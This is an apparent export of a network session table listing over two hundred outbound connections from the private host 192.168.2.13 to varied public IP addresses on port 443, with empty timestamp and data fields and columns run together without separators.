                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17285192.168.2.1337084124.171.245.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17286192.168.2.1359828145.193.148.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17287192.168.2.1349118183.213.200.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17288192.168.2.1343310143.147.180.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17289192.168.2.1358148134.160.100.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17290192.168.2.13543429.136.144.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17291192.168.2.134506414.148.118.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17292192.168.2.1337906223.176.192.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17293192.168.2.133426641.135.24.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17294192.168.2.135004413.226.170.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17295192.168.2.133863650.20.96.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17296192.168.2.134887251.176.170.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17297192.168.2.1354106187.23.173.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17298192.168.2.133534044.248.234.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17299192.168.2.1335014188.197.213.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17300192.168.2.1357306190.115.85.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17301192.168.2.134876865.1.21.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17302192.168.2.135648823.58.56.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17303192.168.2.133481299.235.182.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17304192.168.2.13409269.234.54.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17305192.168.2.135027866.86.210.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17306192.168.2.1341700195.70.236.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17307192.168.2.1351606164.254.214.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17308192.168.2.133816280.207.206.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17309192.168.2.1347224220.55.205.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17310192.168.2.133988054.107.27.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17311192.168.2.133448279.7.18.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17312192.168.2.133841418.224.131.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17313192.168.2.1346850199.217.152.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17314192.168.2.133852034.179.146.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17315192.168.2.1355044137.83.58.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17316192.168.2.1339890139.199.129.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17317192.168.2.134147481.114.67.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17318192.168.2.1360414218.61.251.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17319192.168.2.1342792149.8.122.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17320192.168.2.1360430150.188.143.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17321192.168.2.1355200187.200.157.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17322192.168.2.1355330199.83.168.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17323192.168.2.1347710105.7.177.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17324192.168.2.1334154142.70.66.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17325192.168.2.1350460116.64.249.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17326192.168.2.1337930151.193.53.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17327192.168.2.13353149.165.94.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17328192.168.2.1342788138.94.205.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17329192.168.2.13331305.154.180.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17330192.168.2.1354946112.48.223.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17331192.168.2.1356098116.197.37.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17332192.168.2.1351024159.20.177.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17333192.168.2.1349002116.148.19.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17334192.168.2.1351622168.200.254.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17335192.168.2.1341664198.222.227.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17336192.168.2.135582644.214.83.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17337192.168.2.1350758114.62.36.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17338192.168.2.1335298154.246.7.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17339192.168.2.133333661.120.201.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17340192.168.2.133780863.118.200.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17341192.168.2.134065299.128.21.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17342192.168.2.1360502106.223.246.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17343192.168.2.134895892.129.178.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17344192.168.2.1338868129.197.106.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17345192.168.2.134907284.240.139.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17346192.168.2.1358684118.208.203.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17347192.168.2.1339098162.8.229.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17348192.168.2.1355316221.28.56.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17349192.168.2.1341740179.65.2.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17350192.168.2.1354520147.125.159.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17351192.168.2.1334964128.38.107.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17352192.168.2.135842662.166.73.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17353192.168.2.135794444.176.219.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17354192.168.2.134786265.25.122.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17355192.168.2.1344950134.108.185.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17356192.168.2.1354916178.19.142.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17357192.168.2.1341114185.111.23.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17358192.168.2.1350224182.148.67.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17359192.168.2.133342435.80.43.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17360192.168.2.133373268.125.118.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17361192.168.2.133712449.165.51.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17362192.168.2.1336276115.166.146.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17363192.168.2.135166887.69.222.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17364192.168.2.1351340166.72.138.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17365192.168.2.1351146117.128.119.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17366192.168.2.133886246.104.10.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17367192.168.2.1345236205.65.17.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17368192.168.2.1352600133.46.231.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17369192.168.2.1348462154.31.66.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17370192.168.2.13356162.45.123.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17371192.168.2.13543481.32.57.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17372192.168.2.1354448187.13.39.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17373192.168.2.1354416176.98.128.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17374192.168.2.1347362180.117.67.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17375192.168.2.134909298.109.59.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17376192.168.2.1345468223.67.12.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17377192.168.2.133409492.20.202.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17378192.168.2.1357118161.186.142.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17379192.168.2.134346279.121.28.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17380192.168.2.1344770122.237.116.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17381192.168.2.135135048.11.101.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17382192.168.2.1344712160.254.46.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17383192.168.2.1358372142.203.241.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17384192.168.2.1347254183.135.210.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17385192.168.2.135405849.82.161.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17386192.168.2.1356700108.207.225.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17387192.168.2.1349054108.42.115.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17388192.168.2.135083483.3.59.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17389192.168.2.1345760105.229.199.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17390192.168.2.1360092147.149.153.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17391192.168.2.135853891.44.190.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17392192.168.2.1339682203.241.236.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17393192.168.2.1342736122.1.243.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17394192.168.2.134279236.170.168.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17395192.168.2.1333888166.211.121.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17396192.168.2.1341504157.9.53.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17397192.168.2.1348800130.104.170.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17398192.168.2.1351638102.173.40.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17399192.168.2.1350816144.52.69.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17400192.168.2.1353944216.164.71.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17401192.168.2.134475890.39.231.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17402192.168.2.1347584153.101.228.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17403192.168.2.1352502193.8.168.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17404192.168.2.1354944152.66.52.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17405192.168.2.134039232.249.75.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17406192.168.2.1340754155.42.76.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17407192.168.2.1344078113.210.205.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17408192.168.2.133816454.44.39.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17409192.168.2.1333654216.246.166.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17410192.168.2.134513691.3.189.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17411192.168.2.1357668144.26.117.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17412192.168.2.133642875.241.174.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17413192.168.2.1344362221.30.19.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17414192.168.2.1347266148.75.10.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17415192.168.2.1347878152.92.159.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17416192.168.2.1354284170.199.7.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17417192.168.2.1346618187.62.100.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17418192.168.2.1351686187.177.22.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17419192.168.2.1358486192.167.227.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17420192.168.2.1340238154.198.219.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17421192.168.2.1360074138.84.121.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17422192.168.2.1348490203.76.47.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17423192.168.2.1345732194.51.86.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17424192.168.2.13410529.19.170.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17425192.168.2.1336074180.27.216.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17426192.168.2.1347254158.195.184.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17427192.168.2.1356364173.216.21.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17428192.168.2.135929852.40.96.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17429192.168.2.13334165.85.17.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17430192.168.2.134440683.170.209.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17431192.168.2.1333668128.153.121.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17432192.168.2.1354544196.214.206.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17433192.168.2.1345852148.229.18.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17434192.168.2.1335418199.22.111.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17435192.168.2.1357726159.222.201.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17436192.168.2.135422241.142.230.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17437192.168.2.1357756218.250.190.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17438192.168.2.135130025.194.245.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17439192.168.2.1357828196.33.175.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17440192.168.2.1350870142.225.143.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17441192.168.2.135229638.81.211.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17442192.168.2.1344880112.251.142.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17443192.168.2.1350144168.81.113.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17444192.168.2.1348410108.158.84.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17445192.168.2.134521431.187.15.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17446192.168.2.135104819.0.172.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17447192.168.2.134729637.201.74.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17448192.168.2.1356886103.65.18.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17449192.168.2.1358956160.79.96.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17450192.168.2.1341678179.141.183.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17451192.168.2.1337974146.167.222.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17452192.168.2.136040882.9.113.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17453192.168.2.1348268125.109.111.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17454192.168.2.135487660.50.2.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17455192.168.2.1343536207.141.215.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17456192.168.2.1341984140.195.77.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17457192.168.2.13430128.51.54.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17458192.168.2.133819249.20.54.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17459192.168.2.1343696180.249.253.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17460192.168.2.1351212223.255.232.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17461192.168.2.133678820.248.210.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17462192.168.2.1350004222.148.3.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17463192.168.2.1348760198.84.159.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17464192.168.2.135341240.113.138.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17465192.168.2.1342670129.127.201.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17466192.168.2.1332830113.194.128.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17467192.168.2.1337766118.98.172.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17468192.168.2.1336082187.203.247.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17469192.168.2.1350372189.31.122.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17470192.168.2.135233265.137.8.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17471192.168.2.1339286148.215.93.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17472192.168.2.135936235.54.100.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17473192.168.2.133418278.77.179.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17474192.168.2.136098653.74.166.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17475192.168.2.1340112150.0.201.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17476192.168.2.1341738122.155.204.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17477192.168.2.134621272.119.145.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17478192.168.2.135069842.212.111.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17479192.168.2.1338228209.30.86.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17480192.168.2.1356204172.135.182.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17481192.168.2.1334956165.44.169.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17482192.168.2.1357934169.51.232.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17483192.168.2.1338126122.163.132.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17484192.168.2.1337082142.144.107.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17485192.168.2.1341708135.108.161.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17486192.168.2.1353322122.75.111.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17487192.168.2.1342824169.224.224.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17488192.168.2.1336426122.139.109.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17489192.168.2.135030474.207.122.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17490192.168.2.1340510189.34.162.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17491192.168.2.134606482.203.133.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17492192.168.2.1341854212.83.66.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17493192.168.2.135310438.52.80.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17494192.168.2.135247892.217.7.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17495192.168.2.1353074146.141.149.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17496192.168.2.135141263.58.57.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17497192.168.2.1349272202.194.130.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17498192.168.2.133443436.174.5.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17499192.168.2.1350736150.156.139.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17500192.168.2.1349918148.46.22.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17501192.168.2.135465650.95.85.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17502192.168.2.1353244125.240.178.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17503192.168.2.1359552145.181.27.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17504192.168.2.1346716122.42.165.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17505192.168.2.1353834181.138.38.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17506192.168.2.134041688.221.128.48443
